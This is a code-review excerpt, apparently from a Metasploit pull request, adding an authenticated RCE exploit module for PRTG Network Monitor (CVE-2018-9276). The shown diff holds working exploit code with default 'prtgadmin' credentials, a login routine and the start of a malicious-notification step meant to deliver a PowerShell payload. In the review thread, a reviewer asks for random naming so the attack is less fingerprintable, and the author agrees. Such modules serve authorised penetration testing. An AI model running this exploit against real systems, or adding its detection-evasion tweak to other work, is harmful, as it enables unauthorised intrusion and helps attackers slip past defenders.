modules/exploits/windows/http/prtg_authenticated_rce.rb

```diff
@@ -0,0 +1,283 @@
+        Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command allowing command execution under the context of privileged user.
+        The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE using a Powershell payload.
+        It may require a few tries to get a shell because notifications are queued up on the server.
+        This vulnerability affects versions prior to 18.2.39. See references for more details about the vulnerability allowing RCE.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Josh Berry <josh.berry[at]codewatch.org>', # original discovery
+          'Julien Bedel <contact[at]julienbedel.com>', # module writer
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-9276'],
+          ['URL', 'https://www.codewatch.org/blog/?p=453']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'WfsDelay' => 30 # because notification triggers are queuded up on the server
+      },
+      'DisclosureDate' => '2018-06-25'))
+
+    register_options(
+      [
+        OptString.new('ADMIN_USERNAME', [true, 'The username to authenticate as', 'prtgadmin']),
+        OptString.new('ADMIN_PASSWORD', [true, 'The password for the specified username', 'prtgadmin'])
+      ]
+    )
+  end
+
+  def prtg_connect
+    begin
+      res = send_request_cgi({
+        'method'   => 'POST',
+        'uri'      => normalize_uri(datastore['URI'], 'public', 'checklogin.htm'),
+        'vars_post' => {
+          'loginurl' => '',
+          'username' => datastore['ADMIN_USERNAME'],
+          'password' => datastore['ADMIN_PASSWORD']
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Failed to reach remote host')
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 302 && res.headers['LOCATION'] == '/home' && res.get_cookies
+      @cookies = res.get_cookies.to_s
+      print_good('Successfully logged in with provided credentials')
+      vprint_status("Session cookies : #{@cookies}")
+    else
+      fail_with(Failure::NoAccess, 'Failed to authenticate to the web interface')
+    end
+
+  end
+
+  def prtg_create_notification(cmd)
+    uri = datastore['URI']
+
+    begin
+      res = send_request_cgi({
+        'method'   => 'POST',
+        'uri'      => normalize_uri(uri, 'editsettings'),
+        'cookie'   => @cookies,
+        'headers'  => {
+          'X-Requested-With' => 'XMLHttpRequest'
+        },
+        'vars_post' => {
+          'name_' => 'Exploit', # may be changed for discretion purposes
```

Comment:
Perhaps we can modify this and the notification message to be a little less fingerprintable?
```suggestion
          'name_' => Rex::Text.rand_text_alphanumeric(4..24),
```

Reply:
Thanks for the suggestion, made the commit 😉